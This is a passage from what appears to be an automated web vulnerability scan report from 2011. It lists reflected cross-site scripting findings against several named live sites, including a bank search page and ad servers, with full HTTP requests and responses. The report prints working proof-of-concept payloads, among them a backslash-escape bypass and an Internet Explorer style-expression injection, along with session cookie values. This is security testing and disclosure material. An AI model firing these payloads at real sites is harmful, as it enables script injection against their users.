eeahlgVK-gLzc7v3bufMT3ciwRPOq7W_c7yCEewncWyerLNirskINCTJZ2w2X1u_Ffr45hIaHa_H76oN5ioqf3DUNypCu6kLg-kmXa4JYXwL5SDgVZpbAYwmSs52tJ3ph4JCMa2L50HxvswuEv77HCRTvKMugtX4JGvQuQNrdCkfnoNG4mlIa-6dAvewF741vW4jhVS8ISxl2FC-QxoYM1dFQrs_FmoMnxSVp_tZOCUusIKmakJ6Zxx4MaHG4qowJX52cdsqn6EbbEHzpw1cahm_ednSAyZag0hguPHBGDv4D0F89cj7I3Xm3rPyyOvzQMcybDLE8i5ZewRD7RValSE2YFn6IQ6OPrbpev1rg_I9HjI5ynCo2hqWp8ighHIhRcz2nBg8FKjaOW8AXyWr8jKAqVscXOphesMEv_hKT95FZL-tNurEXc2b78YksLyMCs4H6sMMI5eSol2np-z6bksWnTTE9U8rPoK07OvagfeUFMTT73iH_I9l2OutVYF8_byq_c1Kq7NjC9E9a0eoW9ANcQm2_M-Vs_XiB22OkRMt9wZss2iIyJAJtjtcZ98thcD9J5TC-ggthaT5RIrPMrgXzf_vwOhNf4yW0QtEQEJ55qGc-5cVQ6I7r0sZiLYoBNLt9wJREdAQCGkjhwfIbDh8eKH3liqW8YkScefdM86sUHP_PaiF7fYodG30TCcbE3BCWkK7qQuD6SZdrglhfAvlIOyAmQVZ9Gk9LJN20oRH7d9xucJsk9KwezSI69frNhlnh-VzDUnvD0VSF9GprGKshZpvViBXcPLi1FjMYUJVEbmFVLwhLGXYUL5DGhgzV0VCtu-wgzPw8HAJyjq29STFT-1YYia3j2kAHlFsKaEZ4FVzZEDIrmol-EatT1dqZXDk0mJSx72jjc-JYaXuGhWqtrn6IQ6OPrbpev1rg_I9HjI98tK4Lkd3yYgSLJJRfeUv3Bg8FKjaOW8AXyWr8jKAqVIJgqaELa9gf4ED3OCBald8enkhYgNEwqu2cgvufAu8qsMMI5eSol2np-z6bksWnTbV-gOod-LZDuMZIGw8px0j73iH_I9l2OutVYF8_byq-eWXxP40DPBXd3KCfiOrroHIw5X3-Sh4HUjnsSaxC0epuc0uDxDHt-rTBh2e9nLtgi0gluZrsw7wDK_J5brg91_vwOhNf4yW0QtEQEJ55qGXFlxPVND7eK0NKkmYcNg9jOWDFl6Eb2AIoC5V4JNNKLUZ0sucMJLd08lMBqbvDIPaQ9DijJjsm5f6UC3GKLnVdkeGy8tt3_Zt_zWHCziuKg5syEq3UFt31YVe3zZxRiTrPsbMN1vS3TFG_DmRWjBGoobKMAs1_SjcmCMyMVnnvXgJ4GX4OjUVNjX2CulbPhbYCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgeS-Ii0cHw18f8N_OREqrYbydaelxbY-p8EgzRBPnFKG8nWnpcW2PqfBIM0QT5xShvJ1p6XFtj6nwSDNEE-cUtG5oMP1xzBs04f9aYcpef_h-9zvu-4SLKmRwnyZzNBL4fvc77vuEiypkcJ8mczQS-H73O-77hIsqZHCfJnM0EtFERdyopXzmQlD9vlwvmYOVcj84RfJT-7cTVPiV9xkT9uAa-_yMHADocL3iDyiyA0F0KdTVDhrtMOpab3gV8JpWhzPlVze60NJNLk_VPM-uFocz5Vc3utDSTS5P1TzPrhaHM-VXN7rQ0k0uT9U8z64YjuojwRqay5-ZAaNIzcU3yt_K6BkSAdnJ6PGav_ruqgeixqa40KlkYUwYv6ONa9cufe3IUZ5SPWBETiwrd17lbFsu3zfiF7BPBJIiLSApNR1VhafmVnk6BhX_Sepv3rucGr9Pv9WxoR207LV_JU812XpzTAYSv-BElQmRmwUjrxl6c0wGEr_gRJUJkZsFI68ZenNMBhK_4ESVCZGbBSOvL-FrFoAGy0sFOEtM5Nuv1rHf67HEvueUzrmEU5VKarK0pFHmk8ureZOA97fEANKtQvhIyyKReEJO7XhpyT2HyIL4SMsikXhCTu14ack9h8i0WpNDrvYk58e1CQBxU9aoW0GgBz7JE6lT1FzCJ5VNfptBoAc-yROpU9RcwieVTX6OyZXhK3RWfu9UgjQxzq_ZTsmV4St0Vn7vVII0Mc6v2U7JleErdFZ-71SCNDHOr9lOyZXhK3RWfu9UgjQxzq_ZVXO01XiSEZlE5C1tJgs0ioM_0RPnIuudzXDvK7K8vPFDP9ET5yLrnc1w7yuyvLzxQz_RE-ci653NcO8rsry88UM_0RPnIuudzXDvK7K8vPFdLmcsxIHfv-CcNp2nsZsDDJxgXJI7GH1VuUBYoyz48YycYFySOxh9VblAWKMs-PGv29VFO9u1uo-sTqh6dCOpkhLk4ViUsMPsWwjDbC_pXdIS5OFYlLDD7FsIw2wv6V3SEuThWJSww-xbCMNsL-ld3iOttRS0QEfXzzQ32Qakh0VYOKF3X7wdD8Dnz7l4C4j; fc=dwiJhIujIVbWqBI35CB1OVbkGHNm9MZWojpB1E5U-cOGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOe2yqvnTRFFJZ0ii36dSFkNQ; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15003%7C15001%7C15001%7C15001%7C15001%7C15003%7C15003%7C14983%7C15003%7C15003; rv=1; pf=vYlmmNe4wlXMju21sv8E9BbQtqzBjZadwYr3eEaEEdXu2q8_Jo62qDoNU1sRcsTDMLxOqe5U8OfgCnbpqI2ApX4lLZyvKs0UYrWi2iSsDx65o3Pzwoz6403H7SSItm-xFnOkZRhnTAf1OsSeg86x6N9he2SzgZbMiSxi7XoC0oDOTz_hW1W1inw2PPTXkr5M6IAD_gZxI523_TIIsV7tK-AIolHB94EOuCprrHzPsXFXUf33lMkSWcP-I3s4DQm5; uid=3011330574290390485
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Tue, 02-Aug-2011 19:03:00 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Thu, 03 Feb 2011 19:02:59 GMT Content-Length: 377
The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38030"><script>alert(1)</script>3e8a29e1991 was submitted in the sp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /server/pixel.htm?fpid=4&sp=38030"><script>alert(1)</script>3e8a29e1991&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: r.turn.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_atf?t=1296754761812&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adImpCount=oh0PP3N04fRnBd11giaMRn0GaIuFFc6KU0t95Ihox42Y481wEkFtGX7HudJA1SwJCBsZxoRT6EzfAaBOxC9wKTt4volhK1SKMMEXrRaSQRZi9OYrtG-b0iAWL5Sg__z6Mu5dojwn5g9wbHIYb9itxx7GYSyR957eDlUpeFx78rhPAxXzEzYUFqdsvXkuFIOa3SJBwxhTK9UwlXAscYO_M4PWvpR2lvg2CTziw80-4erd7x2ac5D5zjijBHgETImH6J7mzrOj8gbZmvqalfHq1zOWaaEkLYgoCjpzZqrIOb4Fr-22QJE64x-hU4KLgyMywYPBSo2jlvAF8lq_IygKlasFwtDx2lJttCmO3ikXUoRriPGYYJIwMnnp0drU0iPKrDDCOXkqJdp6fs-m5LFp06AT3l7X8Fu562OsS_bZq3w-94h_yPZdjrrVWBfP28qvw5g9aOhI5RNPyE9rahUCbt3lzlA6-E_XLXUwKlz8M8Rge-axmvL7QRbbVTcWH_69gNe7Lp99y-WLm2CQwebhsP78DoTX-MltELREBCeeahldH37m3WrGWRs0rxyrhTIvfNDSBptsBfTCIkNpNIZ-estuyxh9bLEhi_2rYF-v3jU-PyGR7zYZKkURVc4VktqypCu6kLg-kmXa4JYXwL5SDme2jKGznyNxnorhkYhuuyfTrtrFY_vsI0N2lko9YuVLMugtX4JGvQuQNrdCkfnoNLQy3HrDk_mqO0a-EdfNtHhVS8ISxl2FC-QxoYM1dFQriDP20OwUBwmVn04CK7SdmOrNneCQeM0Mtq9X6LYgOadpuC766m5RMjVQV9XDrztlefh7m2CDoV_VGAxZRTmH65-iEOjj626Xr9a4PyPR4yMPDZSQiR8N05VXl8Kl5CF5wYPBSo2jlvAF8lq_IygKlQ4AcvxicaQ0QJv3A-NEwrP_vYlQQcTfv4G9VvPeZUwSrDDCOXkqJdp6fs-m5LFp05G3ZVFVoXjdVnl7Wbi3hO0-94h_yPZdjrrVWBfP28qvxkUWUDF6X3KpqQdl41aNM0RM74xthkDRQvK455LrVCLLNoiMiQCbY7XGffLYXA_SuLQTgLh8g9Qs477VuC83If78DoTX-MltELREBCeeahlgVK-gLzc7v3bufMT3ciwRPOq7W_c7yCEewncWyerLNirskINCTJZ2w2X1u_Ffr45hIaHa_H76oN5ioqf3DUNypCu6kLg-kmXa4JYXwL5SDgVZpbAYwmSs52tJ3ph4JCMa2L50HxvswuEv77HCRTvKMugtX4JGvQuQNrdCkfnoNG4mlIa-6dAvewF741vW4jhVS8ISxl2FC-QxoYM1dFQrs_FmoMnxSVp_tZOCUusIKmakJ6Zxx4MaHG4qowJX52cdsqn6EbbEHzpw1cahm_ednSAyZag0hguPHBGDv4D0F89cj7I3Xm3rPyyOvzQMcybDLE8i5ZewRD7RValSE2YFn6IQ6OPrbpev1rg_I9HjI5ynCo2hqWp8ighHIhRcz2nBg8FKjaOW8AXyWr8jKAqVscXOphesMEv_hKT95FZL-tNurEXc2b78YksLyMCs4H6sMMI5eSol2np-z6bksWnTTE9U8rPoK07OvagfeUFMTT73iH_I9l2OutVYF8_byq_c1Kq7NjC9E9a0eoW9ANcQm2_M-Vs_XiB22OkRMt9wZss2iIyJAJtjtcZ98thcD9J5TC-ggthaT5RIrPMrgXzf_vwOhNf4yW0QtEQEJ55qGc-5cVQ6I7r0sZiLYoBNLt9wJREdAQCGkjhwfIbDh8eKH3liqW8YkScefdM86sUHP_PaiF7fYodG30TCcbE3BCWkK7qQuD6SZdrglhfAvlIOyAmQVZ9Gk9LJN20oRH7d9xucJsk9KwezSI69frNhlnh-VzDUnvD0VSF9GprGKshZpvViBXcPLi1FjMYUJVEbmFVLwhLGXYUL5DGhgzV0VCtu-wgzPw8HAJyjq29STFT-1YYia3j2kAHlFsKaEZ4FVzZEDIrmol-EatT1dqZXDk0mJSx72jjc-JYaXuGhWqtrn6IQ6OPrbpev1rg_I9HjI98tK4Lkd3yYgSLJJRfeUv3Bg8FKjaOW8AXyWr8jKAqVIJgqaELa9gf4ED3OCBald8enkhYgNEwqu2cgvufAu8qsMMI5eSol2np-z6bksWnTbV-gOod-LZDuMZIGw8px0j73iH_I9l2OutVYF8_byq-eWXxP40DPBXd3KCfiOrroHIw5X3-Sh4HUjnsSaxC0epuc0uDxDHt-rTBh2e9nLtgi0gluZrsw7wDK_J5brg91_vwOhNf4yW0QtEQEJ55qGXFlxPVND7eK0NKkmYcNg9jOWDFl6Eb2AIoC5V4JNNKLUZ0sucMJLd08lMBqbvDIPaQ9DijJjsm5f6UC3GKLnVdkeGy8tt3_Zt_zWHCziuKg5syEq3UFt31YVe3zZxRiTrPsbMN1vS3TFG_DmRWjBGoobKMAs1_SjcmCMyMVnnvXgJ4GX4OjUVNjX2CulbPhbYCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgeS-Ii0cHw18f8N_OREqrYbydaelxbY-p8EgzRBPnFKG8nWnpcW2PqfBIM0QT5xShvJ1p6XFtj6nwSDNEE-cUtG5oMP1xzBs04f9aYcpef_h-9zvu-4SLKmRwnyZzNBL4fvc77vuEiypkcJ8mczQS-H73O-77hIsqZHCfJnM0EtFERdyopXzmQlD9vlwvmYOVcj84RfJT-7cTVPiV9xkT9uAa-_yMHADocL3iDyiyA0F0KdTVDhrtMOpab3gV8JpWhzPlVze60NJNLk_VPM-uFocz5Vc3utDSTS5P1TzPrhaHM-VXN7rQ0k0uT9U8z64YjuojwRqay5-ZAaNIzcU3yt_K6BkSAdnJ6PGav_ruqgeixqa40KlkYUwYv6ONa9cufe3IUZ5SPWBETiwrd17lbFsu3zfiF7BPBJIiLSApNR1VhafmVnk6BhX_Sepv3rucGr9Pv9WxoR207LV_JU812XpzTAYSv-BElQmRmwUjrxl6c0wGEr_gRJUJkZsFI68ZenNMBhK_4ESVCZGbBSOvL-FrFoAGy0sFOEtM5Nuv1rHf67HEvueUzrmEU5VKarK0pFHmk8ureZOA97fEANKtQvhIyyKReEJO7XhpyT2HyIL4SMsikXhCTu14ack9h8i0WpNDrvYk58e1CQBxU9aoW0GgBz7JE6lT1FzCJ5VNfptBoAc-yROpU9RcwieVTX6OyZXhK3RWfu9UgjQxzq_ZTsmV4St0Vn7vVII0Mc6v2U7JleErdFZ-71SCNDHOr9lOyZXhK3RWfu9UgjQxzq_ZVXO01XiSEZlE5C1tJgs0ioM_0RPnIuudzXDvK7K8vPFDP9ET5yLrnc1w7yuyvLzxQz_RE-ci653NcO8rsry88UM_0RPnIuudzXDvK7K8vPFdLmcsxIHfv-CcNp2nsZsDDJxgXJI7GH1VuUBYoyz48YycYFySOxh9VblAWKMs-PGv29VFO9u1uo-sTqh6dCOpkhLk4ViUsMPsWwjDbC_pXdIS5OFYlLDD7FsIw2wv6V3SEuThWJSww-xbCMNsL-ld3iOttRS0QEfXzzQ32Qakh0VYOKF3X7wdD8Dnz7l4C4j; fc=dwiJhIujIVbWqBI35CB1OVbkGHNm9MZWojpB1E5U-cOGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOe2yqvnTRFFJZ0ii36dSFkNQ; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15003%7C15001%7C15001%7C15001%7C15001%7C15003%7C15003%7C14983%7C15003%7C15003; rv=1; pf=vYlmmNe4wlXMju21sv8E9BbQtqzBjZadwYr3eEaEEdXu2q8_Jo62qDoNU1sRcsTDMLxOqe5U8OfgCnbpqI2ApX4lLZyvKs0UYrWi2iSsDx65o3Pzwoz6403H7SSItm-xFnOkZRhnTAf1OsSeg86x6N9he2SzgZbMiSxi7XoC0oDOTz_hW1W1inw2PPTXkr5M6IAD_gZxI523_TIIsV7tK-AIolHB94EOuCprrHzPsXFXUf33lMkSWcP-I3s4DQm5; uid=3011330574290390485
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Tue, 02-Aug-2011 19:03:00 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Thu, 03 Feb 2011 19:02:59 GMT Content-Length: 377
1.431. http://search.wachovia.com/selfservice/microsites/wachoviaSearchEntry.do [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://search.wachovia.com
Path:
/selfservice/microsites/wachoviaSearchEntry.do
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaef9"><script>alert(1)</script>6d3f3e1bc4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /selfservice/microsites/wachoviaSearchEntry.do?aaef9"><script>alert(1)</script>6d3f3e1bc4b=1 HTTP/1.1 Host: search.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=0E2F343A11D72B8481BC40D2D653F4B5; Path=/selfservice Content-Type: text/html;charset=UTF-8 Date: Thu, 03 Feb 2011 13:17:41 GMT Connection: close
The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85494'%3balert(1)//dbe71432c4e was submitted in the h parameter. This input was echoed as 85494';alert(1)//dbe71432c4e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=21818F4&w=300&h=25085494'%3balert(1)//dbe71432c4e&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=885848;x=2304;g=172;c=1220000175,1220000175;i=0;n=1220;1=8;2=1;s=134;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=1080864;h=922865;k= HTTP/1.1 Host: smm.sitescout.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 650 Date: Thu, 03 Feb 2011 16:23:48 GMT Connection: close
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aed62"%3balert(1)//eec28b3a643 was submitted in the pid parameter. This input was echoed as aed62";alert(1)//eec28b3a643 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=21818F4aed62"%3balert(1)//eec28b3a643&w=300&h=250&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=885848;x=2304;g=172;c=1220000175,1220000175;i=0;n=1220;1=8;2=1;s=134;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=1080864;h=922865;k= HTTP/1.1 Host: smm.sitescout.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 650 Date: Thu, 03 Feb 2011 16:23:46 GMT Connection: close
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://smm.sitescout.com/disp?pid=21818F4aed62";alert(1)//eec28b3a643&cm=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%3Fa%3D885848%3Bx%3D2304%3Bg%3D172%3Bc%3D1220000175%2C1220000175%3Bi%3D0%3Bn%3D1220%3B1%3D8%3B2%3D1%3Bs%3D134%3Bg%3D172%3Bm%3D82%3Bw%3D47%3Bi%3D0%3Bu%3DINmz6woB ...[SNIP]...
The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79fda'%3balert(1)//cbed4520d8d was submitted in the w parameter. This input was echoed as 79fda';alert(1)//cbed4520d8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=21818F4&w=30079fda'%3balert(1)//cbed4520d8d&h=250&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=885848;x=2304;g=172;c=1220000175,1220000175;i=0;n=1220;1=8;2=1;s=134;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=1080864;h=922865;k= HTTP/1.1 Host: smm.sitescout.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 650 Date: Thu, 03 Feb 2011 16:23:46 GMT Connection: close
1.435. http://thestreet.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://thestreet.us.intellitxt.com
Path:
/intellitxt/front.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1bad9<script>alert(1)</script>6e86ca26221 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /intellitxt/front.asp?ipid=10685&1bad9<script>alert(1)</script>6e86ca26221=1 HTTP/1.1 Host: thestreet.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.thestreet.com/story/229c029d89d776ed)(sn=*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA6yAEAAAEthmhrrQA-; VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63AEAAAEt6+c+YAA-; Domain=.intellitxt.com; Expires=Mon, 04-Apr-2011 14:22:36 GMT; Path=/ Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: application/x-javascript Vary: Accept-Encoding Date: Thu, 03 Feb 2011 14:22:36 GMT Connection: close Content-Length: 8275
/* This source code is Copyright (c) Vibrant Media 2001-2011 and forms part of the patented Vibrant Media product "IntelliTXT" (sm). */ if('undefined'==typeof $iTXT){var $iTXT={};}if('undefined'==typ ...[SNIP]... ad();}}};function itxtBegin(){ var itxturl='http://thestreet.us.intellitxt.com/v3/door.jsp?ts='+(new Date()).getTime()+'&pagecl='+itxtbtl()+'&enc='+itxtGCE()+'&fv='+gDFVS()+'&muid='+MUID+'&ipid=10685&1bad9<script>alert(1)</script>6e86ca26221=1'; itxturl+='&seid='+gSEID+'&sest='+gSEST; if ($iTXT && $iTXT.js && $iTXT.js.ready) {$iTXT.js.load(itxturl); } else if ($iTXT && $iTXT.js) {$iTXT.js.onload = function() { $iTXT.js.load(itxturl); ...[SNIP]...
The value of the sest request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbce3\'%3balert(1)//470e2868204 was submitted in the sest parameter. This input was echoed as cbce3\\';alert(1)//470e2868204 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /v3/door.jsp?ts=1296742745648&pagecl=2359&enc=&fv=101&muid=&ipid=10685&seid=0&sest=cbce3\'%3balert(1)//470e2868204 HTTP/1.1 Host: thestreet.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.thestreet.com/story/229c029d89d776ed)(sn=*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63AEAAAEt6+LRYAA-
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Content-Type: application/x-javascript;charset=iso-8859-1 Vary: Accept-Encoding Date: Thu, 03 Feb 2011 14:22:49 GMT Connection: close Content-Length: 10430
/* This source code is Copyright (c) Vibrant Media 2001-2011 and forms part of the patented Vibrant Media product "IntelliTXT" (sm). */ try{if('undefined'==typeof $iTXT){var $iTXT={};}$iTXT.door={} ...[SNIP]... omponent(tTXT.replace(/\n/,' ')); while (p.ttxt.indexOf('\'')>-1) p.ttxt=p.ttxt.replace('\'', '%27');p.auat=0;p.lpgv=0;p.ddate=dDate;p.pvu=gPVU;p.pvm=gPVM;p.forcedb=0;p.seid=gSEID;p.unrm=false;p.sest='cbce3\\';alert(1)//470e2868204';p.ru=encodeURIComponent(sRU);cAs(server,p);} else if (gCL){if(((gITXTN!=null&&gITXTN.length)||(gITXTNi!=null&&gITXTNi.length))&&gCL> ...[SNIP]...
The value of the zcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 478ba"style%3d"x%3aexpression(alert(1))"78c9aed888 was submitted in the zcode parameter. This input was echoed as 478ba"style="x:expression(alert(1))"78c9aed888 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?zip=75201&zcode=478ba"style%3d"x%3aexpression(alert(1))"78c9aed888 HTTP/1.1 Host: weather.weatherbug.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
